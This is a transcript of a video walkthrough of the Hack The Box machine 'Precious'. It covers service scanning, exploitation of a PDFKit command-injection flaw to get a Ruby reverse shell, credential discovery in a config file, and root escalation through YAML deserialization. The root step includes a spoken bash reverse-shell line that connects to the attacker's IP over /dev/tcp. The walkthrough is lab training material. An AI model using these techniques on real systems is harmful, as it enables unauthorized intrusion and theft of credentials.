Well, hello everyone, welcome back guys. Hope you all are doing well. This is Mohammad Badruddin and today we are going to solve a machine from Hackthebox. The machine name is Precious and the difficulty level of this machine is easy. So pretty straightforward machine. You will go to the right place and you will get the right exploit and boom. So without wasting time, let's jump into it and we are going to start scanning the target with nmap. So nmap space hyphen s capital V space hyphen s capital C, S capital V for version enumeration, S capital C for default scripts, and the target IP is going to be 10.10.11.189, and I want to save the scan results in in a file named as default.nmap. So I already ran the scan to save the time. I'm going to just show you the scan results. You can name this file as you want. So default.nmap, and here as you can see, two ports are open. The first port is port number 22 TCP port. The port state is open and this port is default for SSH and the SSH service is open SSH 8.4p1. Second port is port number 80. Again, this is a TCP port. Port state is open, default for HTTP, and the server running is NGINX 1.18.0. The important thing here is it discloses the domain name. Although you can solve this machine or hack this machine completely without even using the precious.htb domain name, but it's good to have a record in etc host file. So I already created a record in etc host file with precious.htb with the IP address of the target so that I can access this URL, okay, with the name. And here the application is saying convert web page to the PDF. So if you want to convert any web page to the PDF, you can just enter here the URL of that web page and it will generate a PDF for that web page. So to do this, what I'm going to do here, I'm going to just start the Python server on my machine. So Python space -m http.server on port number 80. If you are already running a service on port number 80, you can change this port as you want. So my server is running. I can test it by saying 127.0.0.1 because it's on localhost. So I can check it like this, or you can also put the IP address like my IP address is 10.10.14.85 right now. So this is the thing. So when I'm going to convert this web page as PDF, I'm going to put here the URL. So http://10.10.14.85 and just hit enter. So once I hit enter, it is going to create a PDF and I can download this PDF. So you can put the same name or you can change the name, whatever you want. But in real time or in real environment, what I did while testing, I keep things as it comes from the application. So here I just changed the name. Fine. So if I go to the folder here, this is the aaa.pdf. I'm going to test the information of this PDF file and I'm going to gather that information by using exif tool. exif tol tool. This is a tool to gather the information about the file and the file name is aaa.pdf. Hit enter. So the exif tool version itself is 12.57. This is not important for me, but what important is this. So file name is this, size, when it's created, what are the permissions, what is the file type, and MIME type application/PDF. It's okay. PDF version is 1.4. Linearized no, page count is 1 because there is only one page, and the creator, in the creator tag we found generated by the PDF kit, V means version 0.8.6. that means whenever this web application is going to generate a PDF, it is generating a PDF by using this plugin. This plugin is used to create web page to the PDF. So I'm going to check out the exploit or vulnerability of this plugin version. straightforward. I'm going to my best friend, which is google.com, and I'm going to search PDF kit version 0.8.6. Where is it? PDF kit v 0.8.6 exploit. It's already giving me here, so hit enter, and there is command injection vulnerability, and the CVE is 2022-25-765. okay, coming here. So as you can see, this is the fix. Upgraded version 0.8.7.2 or higher is okay, but the affected version of this package are vulnerable to command injection where the URL is not properly sanitized. And this is the problem, because what URL you are entering here, it is not sanitized by the application in the backend. So you can do anything, you can write anything here, it is not properly sanitized, and this is the huge problem. The second thing is most important. If you right click here and go to the inspect, go to the network tab. Where is it? This one. And if I just refresh this, and this is the first page, I'm going to click it, and here if you go to the headers, you will find here, scroll down, you can see the X runtime is Ruby, and this is saying what? This is saying that in the backend it's using the Ruby environment. So there is Ruby environment running in the backend, and in the vulnerability it's saying it's not properly sanitized, and because of this vulnerability an attacker can exploit command injection vulnerability, or the command injection vulnerability arises because of not properly sanitized in the backend this input. It's fine. So command injection, once we are going to write the payload for the command injection, we know that in the backend there is Ruby environment running, so we will use the Ruby for the payload. Okay, so there is a proof of concept, and in the proof of concept, as you can see, it is going to put the URL, but with the URL it is going to put one parameter. This parameter is going to be name, and its value is going to be whatever you want. Like here it's using sleep 5 seconds. This is just a proof of concept to make the 5-second delay, but if it is working, then you can also use any payload for the reverse shell or for anything. So I'm directly going to get the reverse shell. So for this I'm going to say ref shell. We can also use one-liner payload for the reverse shell from Pentest Monkey, from Payloads All the Thing, or Hackthebox, but this is also a good source from where you can generate the payload for reverse shells. Okay, that's fine. So here what you need to just put the IP address on which you need to get the reverse shell, which is going to be the attacker IP, and the port number. Let's say I'm going to use 7575, and I'm going to get the reverse shell by using netcat. Operating system is going to be Linux. You can get the reverse shell, bind shell. You can create the payload by MSF Venom or Hawk shell. And because the runtime environment is Ruby, so I'm going to use the Ruby payload. So this is going to be the Ruby payload. So there are two payloads. One is this and one is this. Any of these you can use and try. I'm going to choose the second one because many times this one is the success for me. So coming back to here, I got two ports, port number 22, port number 80, and I got what? I got PDF kit version 0.8.6. It is vulnerable, and this is going to be the payload. Now the second thing is to create the complete payload. What I'm going to do, this is my web server, okay, and here I'm going to use one parameter, its name, and its value is going to be something like this, okay, so something like this. So I'm going to put here this, copy. This is actually the URL encoded form of space %20, and then I'm going to put my payload in two tags, and the payload is going to be this. Copy and paste it here. This is the complete payload. And now I'm going to get this, come back here on the application, close this and put here the complete payload. Now before hitting enter, what I'm going to do, I'm going to back here, I'm going to say nc space hyphen nlvp 7575. So I'm listening for the reverse shell on port 7575 because I generated the payload for 7575. And I'm very sorry, this could be like this. Okay, now back to the browser, hit enter, and hopefully here we get the shell. Wonderful. So who am I? I'm Ruby. ID is this. Okay, now I wanna see how many users are there. Those can run bin bash. So grep /bin/bash, and I'm gonna see it from the etc passwd file. So there are 3 users, root, Henry and Ruby. Right now we are Ruby. We need to escalate our privileges from Ruby to Henry, and for this we need to enumerate more the system as Ruby. So present working directory is var www pdf app. This is the web directory. So I'm going to list the files. There is app config. Config is always important, because in the configuration files many times you get very sensitive information like credentials and other IP addresses, other port. In real life scenario you may find the database credentials and a lot of things. So I'm interested to see what is inside config.ru, because this is the Ruby configuration file. Although there are not much, but the thing what we mentioned before, that the environment, Ruby environment is running fine. So okay, I'm going back to, let's say, cd/home/ruby. Let's see if Ruby has a home directory. Yes, we are in the Ruby home directory. ls space -la, and all of these are default files, but not this one, right? Let's see. If I go here, cd in my home directory, and if I list my files and directories, these are the files. Those are default, but not bundle. Okay, and every operating system has some different default files and directories, but here this bundle directory is not default. Okay, so cd.bundle ls space -la. Let's see what's inside it. There is configuration file, another configuration file is there, and as I mentioned that configuration files are always containing the juicy stuffs. So let's see what's inside this cat config file, and here there are credentials for Henry. Wonderful. So I'm going to Control-Shift-C for copy, come back here and paste that. So this is going to be username, and this is your password. Fine. Okay, so now let's go. We have username, credentials. I'm going to try to get the SSH shell. So SSH Henry at precious.htb. If you did not create the record in etc host file with the name precious.htb, you need to mention here the IP address, but I created the record, so I can use name, and now this is the password. So copy this, come back here, Control-Shift-V, hit enter, and hopefully yes, we get that. Okay, so this is the thing. Now we need to escalate our privileges from Henry user to the root user. First of all, I'm going to see what's inside this. So there is going to be our first flag. So cat user.text, hit enter. This is our first flag. Okay, clear that. Let's do sudo space -l, and as you can see, Henry user can execute this command as root without password. But first of all, I want to see what's inside this. So cat, and that seems a file because it has the extension of Ruby. So paste it here and hit enter. So here there is a command compare installed dependencies with those specified in dependencies.yml. That means there is a file dependencies.yml, and in this file there are dependencies listed. Fine. So when this script is executed, it is going to compare the dependencies already installed in the system with the dependencies listed in dependencies.yml file. So if two dependencies name do not match, it is going to say this dependency is missed. And to do is going to be update version automatically. So there are two modules it needs, require YML and Ruby gems, and definition is going to be update gems list from file, and from where, from dependencies.yml. It is going to read this file and it is going to load it. List local gems, and it is going to specification sorted by, this is something serialization. So we can see, let's see if there is dependencies file exist or not. There is no dependencies file. So it is going to be something like you need to create a dependency file, and you need to write there some kind of Ruby code or bash code payload to get the reverse shell. But first of all, we need to search about YML exploit. It could be YML file, right? Because we need here dependencies.yml. Okay, so YAML exploit. Python YAML deserialization. Okay, this is a good resource for hack tricks. And there is one more, YAML deserialization payloads all the things. This is also good. Blind remote code execution through YAML deserialization. Okay, a lot of resources there. Let's see what it's saying. Exploit PyYAML. We are not looking for Python YAML. We are looking for Ruby YAML, and this is the YML file content. And as you can see here, it is using method ID is system, and socket it's using module as kernel, and this is the command it's trying to execute, sleep for 600 seconds. So instead of this sleep 600 seconds, I can try another command. So let's see, I'm going to copy this, copy that, come back here, paste that, and make sure there is a space. Make sure you delete that space from everywhere, So like this, from every line. Like this. Save this and save it as dependencies.yml. YML is the extension, dependencies. Okay, now back here, first of all we need to, I'm going to clear that, we don't need it. Let's start the Python server, Python 3 space -m HTTP server on port number 80. Come back here, we are already in the Henry home directory. So let's get the file here. This is my IP where I published the HTTP server, and this is the file name YML. Okay, so now sudo space -l. Okay, but there is a problem. I forget to update here the payload. So let's try to put the payload here, and payload is going to be bash, because we are going to execute the system command, and the operating system is Windows, so we can execute Windows, the operating system is Linux, so we can execute here the Linux command. Bash space -c, and /bin slash bash space -i greater than and /dev/tcp /10.10.14.85. Here I want the reverse shell, and let's say I'm going to use port 9999. 0 greater than and 1. That's it. Save. Back here, rm space -rf dependencies.yml. Remove this file and let's get this file again. Fine. I'm going to clear it, sudo space -l. But before going to do this, I'm going to open one more horizontal terminal, and here I'm going to listen on port NLVP 9999. And now from here I'm going to say sudo, and let's execute this command. Paste that and hit enter, and we get the shell. So root at precious.htb. Who am I? I am root. ID is this. Let's go to the root home directory, ls space -la, and there is root.txt. So let's see clear is working or not. Yeah, it's working. Cat user not user, it's root.txt. Okay, so this is going to be the root flag. So that's it for this video. Hope you enjoy it. If you like the content, please like, subscribe and share. If you have any query, please put your query in the comment section. I will try to respond as soon as possible. And what are the resources I use during this video recording, I will mention it in the description section. See you in the next video. Bye.